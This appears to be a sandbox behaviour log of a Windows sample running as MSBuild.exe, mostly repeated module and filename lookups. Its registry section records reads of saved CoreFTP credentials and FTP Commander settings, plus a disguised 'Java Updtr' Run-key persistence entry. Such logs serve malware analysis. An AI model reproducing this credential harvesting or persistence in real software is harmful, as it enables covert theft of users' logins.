Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductId, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Java Updtr, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites value_name = Host, data = 2147942402 False 1
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPort, data = 2147942403 False 1
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser, data = 2147942403 False 1
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPW, data = 2147942403 False 1
Read Value - value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesName, data = 2147942403 False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander value_name = UninstallString, data = 2147942402 False 1
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Java Updtr, data = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 130, type = REG_SZ True 1
Module (630)
Operation Module Additional Information Success Count
Load C:\Windows\system32\advapi32.dll base_address = 0x74d40000 True 1
Load C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll base_address = 0x6a310000 True 1
Get Handle c:\windows\syswow64\user32.dll base_address = 0x74f40000 True 1
Get Handle private_0x0000000000400000 base_address = 0x400000 True 4
Get Filename private_0x0000000000400000 process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 5
Get Filename c:\windows\syswow64\advapi32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 5
Get Filename c:\windows\syswow64\user32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 5
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 5
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 4
Fn
Get Filename c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 4
Fn
Get Filename private_0x0000000000400000 process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 4
Fn
Get Filename c:\windows\syswow64\advapi32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 4
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 4
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 3
Fn
Get Filename c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 3
Fn
